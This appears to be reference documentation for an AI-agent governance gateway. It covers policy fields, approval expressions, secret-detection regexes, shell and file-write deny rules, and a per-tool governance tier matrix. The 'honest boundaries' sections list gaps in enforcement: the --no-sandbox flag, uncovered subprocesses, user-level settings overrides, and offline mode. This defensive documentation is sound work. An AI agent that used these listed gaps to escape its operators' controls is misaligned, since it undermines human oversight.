`limit_per_hour`	integer	(unlimited)	`limit_per_hour: 10`
`requires_approval_if`	expression string	(never)	`requires_approval_if: "path starts_with \"/etc\""`

allow defaults to true when omitted, so a tool entry that only sets limit_per_hour is still permitted.

The `*` wildcard tool

A tool named * is the catch-all entry for any tool without its own named rule. Pair "*": { allow: false } with explicit allow: true entries to get deny-by-default behaviour (see the Strict example). Conversely "*": { allow: true } is an explicit allow-everything default.

tools:
  "*":
    allow: false      # deny every tool not named below
  read_file:
    allow: true       # ...except read_file
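
The lookup order implied above (named rule first, then the `*` entry) might look like this in Python. The helper names are hypothetical, and the sketch deliberately returns `None` when neither a named rule nor `*` exists, because this section does not state what the engine does in that case:

```python
def resolve_tool_rule(tools, tool_name):
    """Return the rule that governs `tool_name`, or None when nothing matches."""
    rule = tools.get(tool_name)
    if rule is None:
        rule = tools.get("*")         # fall back to the catch-all entry
    return rule


def is_tool_allowed(tools, tool_name):
    rule = resolve_tool_rule(tools, tool_name)
    if rule is None:
        return None                   # no named rule and no "*": outside this sketch
    return rule.get("allow", True)    # `allow` defaults to true when omitted


tools = {
    "*": {"allow": False},
    "read_file": {"allow": True},
    "grep": {"limit_per_hour": 10},   # no `allow` key: still permitted
}
```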

`requires_approval_if` expression syntax

requires_approval_if holds a boolean expression evaluated against the in-flight action. When it evaluates true, the action is routed to human-in-the-loop approval instead of executing immediately. The expression is parsed and validated at load time (aa-gateway/src/policy/expr.rs): an empty expression, an unknown variable, or an unknown governance level (L4+) is a hard validation error.

Fail-safe at runtime: if the engine cannot evaluate an expression (parse error, malformed action), it returns true — approval required — never a silent allow.

Grammar

expr       := clause (combinator clause)*
clause     := field op literal
combinator := AND | OR          # AND binds tighter than OR; no parentheses

AND/OR are uppercase. There are no parentheses in this version; an expression is OR-groups of AND-connected clauses.

Operators

Operator	Meaning	Operand types
`==`	equal	string, number, governance level, risk tier
`!=`	not equal	string, number, governance level, risk tier
`>` `>=` `<` `<=`	ordered comparison	number, governance level, risk tier, duration
`contains`	substring / membership	string
`starts_with`	prefix match	string
`in`	value in list	string against `["a", "b"]`
`not_in`	value not in list	string against `["a", "b"]`

Literals

String: double-quoted, e.g. "/etc". Escapes: \" and \\.
Number: integer or float, e.g. 10, 1.5.
List: ["read", "write"] — for in / not_in.
Governance level: L0, L1, L2, L3 (ordered). Any other L<n> is a validation error.
Risk tier: Low, Medium, High, Critical (ordered).
Duration: human-readable, digit-leading, e.g. 24h, 30m, 1h30m (compared as seconds — 24h == 86400).
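
To make the grammar concrete, here is a deliberately small Python sketch of a parser and evaluator. It is not the code in `aa-gateway/src/policy/expr.rs`. It covers only string and number literals with the comparison operators, `contains`, and `starts_with`; lists, `in` / `not_in`, governance levels, risk tiers, and durations are left out. It also assumes the action is a flat dictionary keyed by variable name, and treats a missing key as a malformed action:

```python
import re

_TOKEN = re.compile(
    r'\s*("(?:\\.|[^"\\])*"'             # double-quoted string with \" and \\ escapes
    r'|==|!=|>=|<=|>|<'                  # symbolic operators
    r'|[A-Za-z_][A-Za-z0-9_.]*'          # field names, word operators, AND / OR
    r'|\d+(?:\.\d+)?)'                   # integer or float
)

OPS = {
    "==": lambda a, b: a == b,
    "!=": lambda a, b: a != b,
    ">": lambda a, b: a > b,
    ">=": lambda a, b: a >= b,
    "<": lambda a, b: a < b,
    "<=": lambda a, b: a <= b,
    "contains": lambda a, b: b in a,
    "starts_with": lambda a, b: a.startswith(b),
}


def tokenize(expr):
    expr, pos, tokens = expr.strip(), 0, []
    while pos < len(expr):
        match = _TOKEN.match(expr, pos)
        if match is None:
            raise ValueError(f"unexpected input at offset {pos}")
        tokens.append(match.group(1))
        pos = match.end()
    return tokens


def literal(token):
    if token.startswith('"'):
        return re.sub(r"\\(.)", r"\1", token[1:-1])   # undo \" and \\
    return float(token)               # raises ValueError for anything else


def parse(expr):
    """Return OR-groups of AND-connected (field, op, value) clauses."""
    tokens, groups, current, i = tokenize(expr), [], [], 0
    while True:
        if i + 3 > len(tokens) or tokens[i + 1] not in OPS:
            raise ValueError("expected: field op literal")
        current.append((tokens[i], tokens[i + 1], literal(tokens[i + 2])))
        i += 3
        if i == len(tokens):
            break
        if tokens[i] == "OR":         # OR closes the current AND-group
            groups.append(current)
            current = []
        elif tokens[i] != "AND":
            raise ValueError(f"expected AND or OR, got {tokens[i]!r}")
        i += 1
    groups.append(current)
    return groups


def requires_approval(expr, action):
    try:
        return any(
            all(OPS[op](action[field], value) for field, op, value in group)
            for group in parse(expr)
        )
    except Exception:
        return True                   # fail-safe: cannot evaluate means approval required
```

Because `OR` only ever closes a group, `a == 1 OR b == 1 AND c == 1` reads as `a == 1 OR (b == 1 AND c == 1)`, which is the precedence the grammar describes.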

Operands (variables)

The variable on the left of each clause must be one of the names the evaluator knows. Unknown names are rejected at load time (with a typo suggestion when close). The recognised variables:

Variable	Resolves against	Type
`tool`	the called tool’s name	string
`path`	a file-access path	string
`url`	a network-request URL	string
`method`	a network-request HTTP method	string
`command`	a process-exec command line	string
`args.<key>[.<nested>]`	a JSON field inside a tool call’s `args` body	string / number
`tool_result.<key>[.<nested>]`	a JSON field inside a tool result	string / number
`tool_result`	the entire serialised tool-result body	string (`contains`/`starts_with` only)
`governance_level`	the agent’s governance level	level (`L0`–`L3`)
`agent.depth`	delegation depth	number
`agent.risk_tier`	the agent’s risk tier	tier
`agent.age`	seconds since the agent registered	number / duration
`agent.parent_agent_id`	the agent’s parent id	string
`agent.team_id`	the agent’s team id	string
`agent.children_count`	number of direct children	number
`agent.is_root`	`1` when depth == 0, else `0`	number (`==`/`!=`)
`agent.is_leaf`	`1` when children_count == 0, else `0`	number (`==`/`!=`)
`team.active_agents`	running agents in the team	number
`team.parallel_agents`	alias of `team.active_agents`	number
`team.budget_remaining`	remaining monthly budget	number
`child.tool`	tool names across direct children	string
`child.risk_tier`	risk tier of a child being spawned	tier
`parent.risk_tier`	the parent agent’s risk tier	tier
`source.team_id`	sending team of a message	string
`target.team_id`	recipient team of a message	string
`target.channel_id`	message channel id	string

The args.<key> and tool_result.<key> forms walk a JSON pointer (args.path → /path, args.headers.authorization → /headers/authorization). They are null-safe: a non-matching action variant, malformed JSON, or an unresolved pointer evaluates to false (no match), not fail-safe-true.
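
The null-safe walk can be illustrated with a short Python sketch. It assumes the body arrives as a raw JSON string; the helper names are hypothetical:

```python
import json


def resolve_json_path(variable, raw_body):
    """Resolve e.g. 'args.headers.authorization' against a JSON string.

    Returns None when the body is not valid JSON or the path does not resolve.
    """
    keys = variable.split(".")[1:]    # drop the leading 'args' / 'tool_result'
    try:
        node = json.loads(raw_body)
    except (TypeError, ValueError):
        return None                   # malformed JSON: no match, not an error
    for key in keys:
        if not isinstance(node, dict) or key not in node:
            return None               # unresolved pointer
        node = node[key]
    return node


def clause_contains(variable, needle, raw_body):
    """Evaluate `<variable> contains <needle>`; anything unresolved is False."""
    value = resolve_json_path(variable, raw_body)
    return isinstance(value, str) and needle in value
```

Note the contrast with the runtime fail-safe described earlier: here a failed lookup simply does not match, so it never forces an approval on its own.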

Example expressions

Each of the following is a valid requires_approval_if value:

"path starts_with \"/etc\"" — gate writes under /etc.
"args.path contains \"/etc\"" — same idea, reading the path out of a tool call’s JSON args.
"command contains \"sudo\"" — gate any shell command invoking sudo.
"url contains \"internal\"" — gate requests to internal hosts.
"tool == \"delete_database\"" — gate one specific tool by name.
"agent.depth > 1" — gate actions from agents deeper than one delegation hop.
"agent.children_count > 10" — gate agents that have spawned many children.
"governance_level >= L2" — gate when the agent runs at L2 (Enforce) or above.
"agent.risk_tier >= High" — gate high- and critical-risk agents.
"agent.age < 24h" — gate brand-new agents (registered under a day ago).
"method == \"DELETE\" OR method == \"PUT\"" — gate destructive HTTP verbs.
"target.team_id in [\"finance\", \"security\"]" — gate messages sent to sensitive teams.
"tool_result contains \"sk-\"" — gate when the response body looks like it carries a secret.
"command contains \"rm\" AND agent.is_root == 0" — gate rm from non-root (delegated) agents only.

Divergence note. Earlier drafts of this reference used illustrative expressions such as "call_count > 10". There is no call_count variable in the engine: per-tool rate limiting is expressed with the limit_per_hour field, and “how many children” is agent.children_count. Only the variables in the table above are accepted; anything else fails validation.

`data`

Sensitive-data / credential handling. Backed by DataPolicy.

Field	Type	Default	Example
`sensitive_patterns`	list of regex strings	`[]`	`sensitive_patterns: ["sk-[A-Za-z0-9]{20,}"]`
`credential_action`	enum	`redact_only`	`credential_action: block`

`credential_action` values

Value	Behaviour
`block`	Refuse the action; the engine returns `Deny` (reason `credential detected`) and the payload never reaches upstream.
`redact_only`	(default) Forward a redacted form of the payload upstream. Preserves historical behaviour.
`alert_only`	Forward the unmodified payload and raise an alert. A deliberate downgrade for low-risk, audit-only modes.

Any other value is a validation error.
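
The three behaviours can be contrasted in a short Python sketch. The return shape, the `[REDACTED]` placeholder, and the function name are assumptions made for illustration. Python's `re` module is also a different engine from the Rust regex crate, so treat this as a model of the decision logic only:

```python
import re

VALID_ACTIONS = {"block", "redact_only", "alert_only"}


def apply_credential_action(payload, patterns, action="redact_only"):
    """Return (decision, payload_to_forward, alerts) for one outbound payload."""
    if action not in VALID_ACTIONS:
        raise ValueError(f"unknown credential_action: {action!r}")
    compiled = [re.compile(p) for p in patterns]
    if not any(rx.search(payload) for rx in compiled):
        return ("allow", payload, [])             # nothing sensitive found
    if action == "block":
        return ("deny", None, ["credential detected"])
    if action == "redact_only":
        redacted = payload
        for rx in compiled:
            redacted = rx.sub("[REDACTED]", redacted)   # placeholder text is an assumption
        return ("allow", redacted, [])
    # alert_only: forward the payload untouched and raise an alert.
    return ("allow", payload, ["credential detected"])
```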

`sensitive_patterns` regex syntax

Each entry is a regular expression compiled by the Rust regex crate (RE2-style: linear-time, no backtracking, no look-around or backreferences). An invalid regex is a hard validation error (data.sensitive_patterns[i]: invalid regex: ...). Inside a double-quoted YAML string, backslashes must themselves be escaped, so a US-SSN pattern is written "\\b\\d{3}-\\d{2}-\\d{4}\\b"; a single-quoted YAML string takes the pattern as-is ('\b\d{3}-\d{2}-\d{4}\b').

Built-in vs custom

The runtime ships a built-in credential scanner (aa-security) that always runs, independent of sensitive_patterns. It is an Aho-Corasick literal matcher covering common high-confidence secret prefixes, including:

API keys: sk- (OpenAI), sk-ant- (Anthropic), AKIA… (AWS), GCP service accounts, Azure connection strings.
Tokens: ghp_ / ghs_ (GitHub), xoxb- / xoxp- / xoxa- (Slack).
Database URLs: postgres://, mysql://, mongodb://.
Private keys: RSA, EC, OpenSSH, PKCS#8, PGP PEM blocks.

sensitive_patterns is the custom layer on top: your own regexes for organisation-specific identifiers (employee IDs, internal hostnames, PII shapes like SSNs or emails) that the built-in literal set does not cover.

Performance notes

The built-in scanner is pre-compiled once at construction; each scan pays zero pattern-compilation cost and runs in a single Aho-Corasick pass.
Custom sensitive_patterns are compiled by the regex crate. Because that engine is backtracking-free, match time is linear in the input length — there is no catastrophic-backtracking risk. Still, keep the pattern list small and anchored where possible; each pattern is an independent scan over the payload.

`budget`

Spend limits in US dollars. Backed by BudgetPolicy.

Field	Type	Default	Example
`daily_limit_usd`	float > 0	(no cap)	`daily_limit_usd: 20.0`
`monthly_limit_usd`	float > 0, ≥ daily	(no cap)	`monthly_limit_usd: 400.0`
`org_daily_limit_usd`	float > 0	(no cap)	`org_daily_limit_usd: 100.0`
`org_monthly_limit_usd`	float > 0, ≥ org daily	(no cap)	`org_monthly_limit_usd: 2000.0`
`timezone`	IANA tz string	`UTC`	`timezone: "America/New_York"`
`action_on_exceed`	enum	`deny`	`action_on_exceed: suspend`
`window`	duration string	(calendar day)	`window: "1h30m"`

Currency

All limits are USD. There is no currency selector — costs are computed from a USD pricing table and compared against these USD caps.

Per-agent vs global vs per-org

Spend is tracked per agent, and rolled up to team, org, and global totals.

daily_limit_usd / monthly_limit_usd are the global caps (applied to the aggregate).
org_daily_limit_usd / org_monthly_limit_usd add an independent per-org cap, enforced separately from the global cap. Either can trip first.

Timezone & reset behaviour

timezone (an IANA name such as Europe/London) sets the boundary at which the daily and monthly counters reset. It defaults to UTC. An unparseable name is a validation error (budget.timezone: '<x>' is not a valid IANA timezone name).

Daily reset: counters reset at local midnight in the configured timezone. Reset is lazy — it happens on the next spend event once the stored date is earlier than “today” in that timezone, so an idle agent’s counter simply carries the old date until its next request.
Monthly reset: triggers when the stored month differs from the current month in the configured timezone.
window overrides the calendar-day rollover with a fixed rolling window (humantime duration, e.g. 5s, 30m, 1h). Must be a positive duration.
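
The lazy daily reset can be modelled in a few lines of Python. This is a sketch of the behaviour described above, not the gateway's implementation: `DailyCounter` and `record_spend` are hypothetical names, and a fixed UTC+8 offset stands in for `Asia/Taipei` so the example needs no timezone database (with one available you would pass `zoneinfo.ZoneInfo("Asia/Taipei")` instead):

```python
from dataclasses import dataclass
from datetime import date, datetime, timedelta, timezone
from typing import Optional


@dataclass
class DailyCounter:
    spent_usd: float = 0.0
    day: Optional[date] = None        # local date the counter belongs to


def record_spend(counter, amount_usd, now, tz):
    """Add a spend event, resetting first if the local date has rolled over."""
    today = now.astimezone(tz).date()
    if counter.day is None or counter.day < today:
        counter.spent_usd = 0.0       # lazy reset: only happens on a spend event
        counter.day = today
    counter.spent_usd += amount_usd
    return counter.spent_usd


taipei = timezone(timedelta(hours=8))  # fixed-offset stand-in for "Asia/Taipei"
counter = DailyCounter()
# 15:00 UTC is 23:00 local on 1 January.
record_spend(counter, 3.0, datetime(2026, 1, 1, 15, 0, tzinfo=timezone.utc), taipei)
# 16:30 UTC is 00:30 local on 2 January, so the counter resets before adding.
record_spend(counter, 2.0, datetime(2026, 1, 1, 16, 30, tzinfo=timezone.utc), taipei)
```

Between the two events nothing runs at local midnight; the stored date is simply compared on the next spend.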

`action_on_exceed`

Value	Behaviour
`deny`	(default) Deny individual over-budget requests but keep the agent active.
`suspend`	Suspend the agent entirely until the budget resets.

Validation rules: every limit must be > 0; monthly_limit_usd must be ≥ daily_limit_usd (and the same for the org pair). Equal monthly/daily is allowed; monthly without daily is allowed.
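
Those rules translate directly into a small checker. A sketch in Python, operating on the parsed `budget` mapping; the function name and message wording are hypothetical and will not match the validator's output verbatim:

```python
LIMIT_KEYS = (
    "daily_limit_usd",
    "monthly_limit_usd",
    "org_daily_limit_usd",
    "org_monthly_limit_usd",
)
PAIRS = (
    ("daily_limit_usd", "monthly_limit_usd"),
    ("org_daily_limit_usd", "org_monthly_limit_usd"),
)


def validate_budget(budget):
    """Return a list of problems; an empty list means the limits are consistent."""
    errors = []
    for key in LIMIT_KEYS:
        if key in budget and not budget[key] > 0:
            errors.append(f"budget.{key}: must be > 0")
    for daily, monthly in PAIRS:
        # Only compared when both are present; monthly without daily is fine.
        if daily in budget and monthly in budget and budget[monthly] < budget[daily]:
            errors.append(f"budget.{monthly}: must be >= {daily}")
    return errors
```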

`schedule`

Time-of-day gating. Backed by SchedulePolicy → ActiveHours.

Field	Type	Default	Example
`active_hours.start`	`HH:MM` 24h	(required if `active_hours` present)	`start: "09:00"`
`active_hours.end`	`HH:MM` 24h	(required if `active_hours` present)	`end: "18:00"`
`active_hours.timezone`	IANA tz string	(required if `active_hours` present)	`timezone: "Asia/Taipei"`

When active_hours is set, the agent is permitted to run only inside the [start, end) window in the given timezone. Omitting schedule entirely means the agent is always active.

Validation rules

start and end must be zero-padded HH:MM (e.g. 09:00, not 9:00), hours 00–23, minutes 00–59.
start must be earlier than end (string comparison on HH:MM). A window that wraps past midnight (e.g. 22:00–06:00) is rejected — model overnight coverage as two policies or a single all-hours policy instead.
All three fields are required once active_hours is present.
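
A Python sketch of these checks and of the half-open window test. The helper names and messages are hypothetical, and the timezone is only checked for presence here, not parsed:

```python
import re

_HHMM = re.compile(r"([01]\d|2[0-3]):[0-5]\d")   # zero-padded 24-hour HH:MM


def validate_active_hours(active_hours):
    """Return a list of problems; an empty list means the window is valid."""
    errors = []
    for key in ("start", "end", "timezone"):
        if key not in active_hours:
            errors.append(f"schedule.active_hours.{key}: required")
    for key in ("start", "end"):
        value = active_hours.get(key)
        if value is not None and not _HHMM.fullmatch(value):
            errors.append(f"schedule.active_hours.{key}: must be zero-padded HH:MM")
    # Zero-padded strings compare in clock order, so a plain string comparison works.
    if not errors and not active_hours["start"] < active_hours["end"]:
        errors.append("schedule.active_hours: start must be earlier than end")
    return errors


def is_active(active_hours, local_hhmm):
    """True when the local wall-clock time falls inside [start, end)."""
    return active_hours["start"] <= local_hhmm < active_hours["end"]
```

The string comparison is also why the zero-padding rule matters: `"9:00" < "18:00"` is false as a string comparison, while `"09:00" < "18:00"` is true.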

IANA timezone strings

Use canonical IANA names: UTC, America/New_York, Europe/London, Asia/Taipei, Asia/Tokyo, etc. Fixed offsets like GMT+8 are not IANA names and should be avoided.

Multiple active windows

A single policy expresses one window. To grant several disjoint windows (e.g. a morning and an afternoon block), apply multiple policies at different scopes in the cascade, or widen to a single enclosing window.

DST & timezone edge cases

Because the window is interpreted in a named IANA zone (not a fixed offset), it follows daylight-saving transitions automatically — 09:00–18:00 stays “9am to 6pm local” across the spring-forward and fall-back shifts. Two edge cases are inherent to wall-clock time:

Spring forward (clocks jump, e.g. 02:00→03:00): a start/end that names the skipped hour refers to a wall-clock time that does not exist on that date. Prefer windows outside the local DST gap.
Fall back (clocks repeat an hour): a time inside the repeated hour occurs twice. The window still opens and closes, but the repeated wall-clock hour is ambiguous. Avoid placing a boundary inside the local fall-back hour for predictable behaviour.

Keeping boundaries away from the very early-morning DST transition hours sidesteps both cases.

`capabilities`

Coarse-grained allow/deny of action categories. Backed by aa_core::CapabilitySet. Merged across the scope cascade with parent-deny-wins semantics.

Field	Type	Default	Example
`allow`	list of capability strings	`[]`	`allow: ["file_read"]`
`deny`	list of capability strings	`[]`	`deny: ["terminal_exec"]`

Recognised capability strings:

String	Capability
`file_read`	read the filesystem
`file_write`	write the filesystem
`network_outbound`	outbound network
`network_inbound`	inbound network
`terminal_exec`	execute shell commands
`agent_spawn`	spawn child agents
`mcp_tool:<name>`	use a named MCP tool, e.g. `mcp_tool:git`
`model:<name>`	use a named model, e.g. `model:gpt-4o`

An unknown capability string, or an mcp_tool: / model: with an empty name, is a validation error.
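
The recognition rule is easy to mirror when linting policies outside the gateway. A minimal Python sketch, with a hypothetical function name:

```python
SIMPLE_CAPABILITIES = {
    "file_read",
    "file_write",
    "network_outbound",
    "network_inbound",
    "terminal_exec",
    "agent_spawn",
}
PREFIXED_CAPABILITIES = ("mcp_tool:", "model:")


def is_valid_capability(capability):
    """True for a recognised capability string, False for anything else."""
    if capability in SIMPLE_CAPABILITIES:
        return True
    for prefix in PREFIXED_CAPABILITIES:
        if capability.startswith(prefix):
            return len(capability) > len(prefix)   # the name must not be empty
    return False
```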

`approval`

Per-policy overrides for the approval-escalation routing. Backed by ApprovalPolicy. When omitted, team routing defaults apply.

Field	Type	Default	Example
`timeout_seconds`	integer	(team default)	`timeout_seconds: 600`
`escalation_role`	string	(team default)	`escalation_role: org-admin`

Note the distinction between the top-level approval_timeout_secs (the global approval timeout for the document, default 300) and the approval.timeout_seconds override inside this section.

Three complete example policies

These ship under policy-examples/ and all pass aasm policy validate.

Strict

Deny all unknown tools, $5/day budget, block all sensitive data. See policy-examples/strict.yaml.

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: strict
  version: "1.0.0"
  description: >
    Lock everything down. Deny all unknown tools, cap spend at $5/day,
    and block any payload that trips the sensitive-data scanner. Use this
    as the baseline for high-risk or untrusted agents.
spec:
  scope: global

  network:
    # Empty-but-present allowlist still allows any host (an empty list means
    # "no restriction"). To actually restrict egress, list the exact hosts.
    allowlist:
      - api.openai.com
      - api.anthropic.com

  budget:
    daily_limit_usd: 5.0
    monthly_limit_usd: 100.0
    timezone: "UTC"
    action_on_exceed: suspend

  data:
    # Block the payload outright when the scanner finds a credential.
    credential_action: block
    sensitive_patterns:
      - "sk-[A-Za-z0-9]{20,}"
      - "AKIA[0-9A-Z]{16}"
      - "-----BEGIN [A-Z ]*PRIVATE KEY-----"

  # Capability floor: deny the dangerous categories regardless of per-tool rules.
  capabilities:
    deny:
      - terminal_exec
      - file_write
      - network_inbound

  # Deny every tool that is not explicitly allowed below.
  tools:
    "*":
      allow: false
    read_file:
      allow: true
      limit_per_hour: 60
    http_get:
      allow: true
      limit_per_hour: 30
      requires_approval_if: "url contains \"internal\""

Balanced

Allowlist common tools, $20/day budget, PII detection on (redact). See policy-examples/balanced.yaml.

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: balanced
  version: "1.0.0"
  description: >
    A pragmatic default for trusted internal agents. Allowlist the common
    tools, cap spend at $20/day, and detect PII / credentials by redacting
    rather than blocking so workflows keep running.
spec:
  scope: global

  network:
    allowlist:
      - api.openai.com
      - "*.anthropic.com"
      - "*.slack.com"
      - api.github.com

  schedule:
    active_hours:
      start: "08:00"
      end: "20:00"
      timezone: "America/New_York"

  budget:
    daily_limit_usd: 20.0
    monthly_limit_usd: 400.0
    timezone: "America/New_York"
    action_on_exceed: deny

  data:
    # Redact-only: forward a scrubbed payload upstream instead of refusing it.
    credential_action: redact_only
    sensitive_patterns:
      # PII detection: US SSN and a generic email address.
      - "\\b\\d{3}-\\d{2}-\\d{4}\\b"
      - "\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}\\b"

  tools:
    read_file:
      allow: true
      limit_per_hour: 120
    http_get:
      allow: true
      limit_per_hour: 60
    web_search:
      allow: true
      limit_per_hour: 30
    write_file:
      allow: true
      requires_approval_if: "path starts_with \"/etc\" OR path contains \"..\""
    shell:
      allow: true
      limit_per_hour: 10
      requires_approval_if: "command contains \"rm\" OR command contains \"sudo\""

Audit-only

Log everything, enforce nothing. See policy-examples/audit-only.yaml.

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: audit-only
  version: "1.0.0"
  description: >
    Observe everything, enforce nothing. Every tool is allowed and the
    sensitive-data scanner only raises an alert without modifying or blocking
    the payload. Use this to map an agent's behaviour before tightening rules.
spec:
  scope: global

  # No `network:` clause → egress is unrestricted (default-open).
  # No `budget:` clause → no spend cap is enforced.

  data:
    # alert_only: forward the unmodified payload and raise an alert side-effect.
    # Deliberate downgrade documented for low-risk, audit-only modes.
    credential_action: alert_only
    sensitive_patterns:
      - "sk-[A-Za-z0-9]{20,}"

  tools:
    # Wildcard allow: every tool is permitted; findings are logged, not enforced.
    "*":
      allow: true

L0–L3 Governance Capability Matrix

This document defines the four governance tiers used across all AI Agent Assembly dev-tool adapters and declares the tier attained by each supported tool for each capability dimension. It is the single source of truth for “what does L2 mean for this tool” — adapter implementation Stories reference this document rather than defining tiers ad hoc.

Status: Codex, GitHub Copilot, and Windsurf Cascade tiers are final (adapters merged). Claude Code (AAASM-201) and SaaS coding-agent (AAASM-918) rows are placeholders pending those adapters landing.

Tier definitions

Tier	Name	What AAASM can do
L0	Discover	Auto-inventory the tool: name, version, config file paths. No runtime hooks. AAASM knows the tool is present but cannot observe or affect its actions.
L1	Observe	Tool actions appear in the AAASM audit log. Policy rules are evaluated and results are visible to operators, but the tool is not blocked — it runs uninhibited. Provides real-time observability without enforcement.
L2	Enforce	Policy overlay is active. AAASM evaluates rules and blocks, redirects, or redacts violating actions while AAASM is running. The tool cannot bypass enforcement, but may operate without constraint if AAASM is offline.
L3	Native Governed	AAASM writes the tool’s own native configuration (settings files, sandbox config, MCP registry). Governance is baked into the tool’s startup state — even if AAASM goes offline, the last-written settings cap what the tool can do. Strongest enforcement tier.
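
Because the tiers are ordered, they map naturally onto an ordered enumeration. A small Python sketch, with hypothetical names, showing the ordering and the point at which blocking becomes possible:

```python
from enum import IntEnum


class GovernanceLevel(IntEnum):
    L0 = 0  # Discover
    L1 = 1  # Observe
    L2 = 2  # Enforce
    L3 = 3  # Native Governed


def parse_level(text):
    """Parse 'L0'..'L3'; any other label is rejected."""
    try:
        return GovernanceLevel[text]
    except KeyError:
        raise ValueError(f"unknown governance level: {text!r}") from None


def can_block(level):
    """Blocking starts at L2 (Enforce); L0 and L1 only discover or observe."""
    return level >= GovernanceLevel.L2
```

A tool's tier is declared per capability, so a check like `can_block` applies to one capability row at a time rather than to a tool as a whole.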

Capability matrix

Rows are the seven governance capability dimensions. Columns are the four tiers. A cell answers: “At this tier, is this capability available?”

Capability	L0 Discover	L1 Observe	L2 Enforce	L3 Native Governed
Audit log capture	No	Yes — every action emits an audit event with agent attribution, timestamp, and tool context	Yes	Yes
Policy decision visibility	No	Yes — policy rules evaluated per action; results visible in dashboard and `aasm policy check`	Yes	Yes
MCP server allowlist enforcement	No	No — MCP server list is observed but not restricted	Yes — deny list enforced at proxy layer	Yes — allowed MCP server list written to tool’s native config; tool cannot load unlisted servers at startup
Terminal-exec block	No	No	Yes — exec calls intercepted at proxy or SDK layer; blocked when policy says deny	Partial — depends on tool-native sandbox support; see per-tool declarations below
File-write block	No	No	Yes — file-write events evaluated by policy; violations blocked at proxy or SDK layer	Partial — depends on tool-native sandbox support; see per-tool declarations below
Network-egress block	No	No	Yes — outbound HTTPS intercepted by `aa-proxy`; hosts not in allowlist receive 403	Partial — some tools support native network restrictions in their config; see per-tool declarations below
Sub-agent governance	No	Yes — spawned agents are registered and appear in the topology tree	Yes — child agents inherit parent’s policy scope; budget shared	Yes — spawned agents are registered with governing tool’s team ID at the native config level

Per-tool tier declarations

Codex

Adapter: AAASM-202 (Done) · Mechanism: sandbox policy sync + approval alignment + wrapper integration

Capability	Tier	Notes
Audit log capture	L2	Wrapper intercepts Codex API calls; audit events emitted for every tool invocation
Policy decision visibility	L2	Policy evaluated per call; decisions surfaced via `aasm topology` and dashboard
MCP server allowlist	L3	AAASM writes the Codex sandbox `allowed_mcp_servers` list at startup and on policy change
Terminal-exec block	L3	Codex sandbox natively restricts exec; AAASM syncs the allowed-commands list from policy
File-write block	L3	Codex sandbox file restrictions synced from AAASM policy (`allowed_paths`, `denied_paths`)
Network-egress block	L2	Proxy layer intercepts outbound HTTPS; Codex sandbox network restrictions also synced (belt-and-suspenders)
Sub-agent governance	L2	Sub-processes spawned by Codex register with AAASM via wrapper; inherit parent team policy

Honest boundaries for Codex:

If the user invokes Codex with --no-sandbox, all L3 enforcement is bypassed. AAASM detects this at L1 (audit event) but cannot enforce.
Codex sandbox restrictions apply to the Codex subprocess only; they do not restrict processes Codex spawns via subprocess.run() unless the sandbox’s exec allowlist is set correctly.
Approval-queue flows require AAASM gateway to be reachable; offline mode defaults to the policy’s offline_action (allow or deny).

GitHub Copilot

Adapter: AAASM-203 (Done) · Mechanism: VS Code settings alignment + MCP governance

Capability	Tier	Notes
Audit log capture	L1	VS Code extension telemetry hooks emit audit events for Copilot chat messages and inline suggestions
Policy decision visibility	L1	Policy decisions are visible in dashboard; enforcement is observability-only at this tier
MCP server allowlist	L3	AAASM writes `github.copilot.chat.mcp.enabled` and the allowed MCP server list to VS Code `settings.json` via the settings sync adapter
Terminal-exec block	L0	VS Code’s extension API does not expose a hook to block terminal commands initiated by Copilot. Blocking requires proxy layer (Layer 2) running alongside.
File-write block	L0	VS Code extension API provides no file-write veto for inline edits. Observable via audit but not blockable at the extension level.
Network-egress block	L1	Proxy layer can intercept outbound HTTPS from the VS Code process; no native Copilot setting restricts outbound hosts.
Sub-agent governance	L0	Copilot does not expose a sub-agent spawning API that AAASM can intercept at the extension level.

Honest boundaries for GitHub Copilot:

Terminal-exec and file-write enforcement require aa-proxy (Layer 2) running as a system-level MitM. The VS Code extension adapter alone cannot provide L2+ enforcement for these capabilities.
VS Code settings sync writes settings.json at the workspace level; a user can override at the user-settings level. Enterprise-grade enforcement requires VS Code managed device policies (outside AAASM scope).
Network-egress block via proxy does not cover VS Code’s built-in Copilot HTTPS calls unless the proxy CA is trusted by the VS Code process.

Windsurf Cascade

Adapter: AAASM-204 (Done) · Mechanism: admin settings sync + MCP registry control

Capability	Tier	Notes
Audit log capture	L1	Windsurf telemetry hooks emit audit events for Cascade tool calls and agent spawning
Policy decision visibility	L1	Policy evaluated and results visible; enforcement passive at this tier
MCP server allowlist	L3	AAASM writes the Windsurf MCP registry (`~/.codeium/windsurf/mcp_registry.json`) via admin settings sync; unlisted servers are not loaded at Windsurf startup
Terminal-exec block	L1	Cascade terminal actions are observable; no Windsurf-native exec block API exists. L2 blocking requires proxy layer.
File-write block	L1	File edits are observable in audit log; no Windsurf-native veto API. L2 blocking requires proxy layer.
Network-egress block	L1	Outbound HTTPS interceptable by proxy layer; no Windsurf-native network restriction config.
Sub-agent governance	L1	Windsurf Cascade multi-agent flows are observable; child agents appear in topology but do not inherit policy scope automatically without the SDK.

Honest boundaries for Windsurf Cascade:

Windsurf does not expose a sandbox mode. L2 enforcement for exec and file operations requires aa-proxy running at the system level.
Admin settings sync requires Windsurf’s config directory to be writable by the AAASM process. In multi-user environments, this requires elevated permissions or a per-user deployment.
MCP registry control only governs MCP servers loaded by Windsurf at startup. A user can manually add servers to a workspace-level config that overrides the registry.

Claude Code

Adapter: AAASM-201 — Pending (in backlog) · Placeholder — do not rely on these declarations until AAASM-201 is merged

Capability	Tier	Notes
Audit log capture	TBD	—
Policy decision visibility	TBD	—
MCP server allowlist	TBD	—
Terminal-exec block	TBD	—
File-write block	TBD	—
Network-egress block	TBD	—
Sub-agent governance	TBD	—

SaaS Coding-Agent (Claude.ai / ChatGPT / Codex-web)

Adapter: AAASM-918 — Pending (in backlog) · Placeholder — tier declarations incomplete

Capability	Tier	Notes
Audit log capture	L1	SaaS agents emit L0–L1 events via the observability adapter (browser extension or API-level hook); execution is remote and not fully inspectable
Policy decision visibility	L1	Policy decisions are visible but enforcement is not possible at the cloud execution layer
MCP server allowlist	L0	Cloud-hosted tools do not expose an MCP allowlist config that AAASM can control
Terminal-exec block	L0	Remote execution; no AAASM enforcement path
File-write block	L0	Remote execution; no AAASM enforcement path
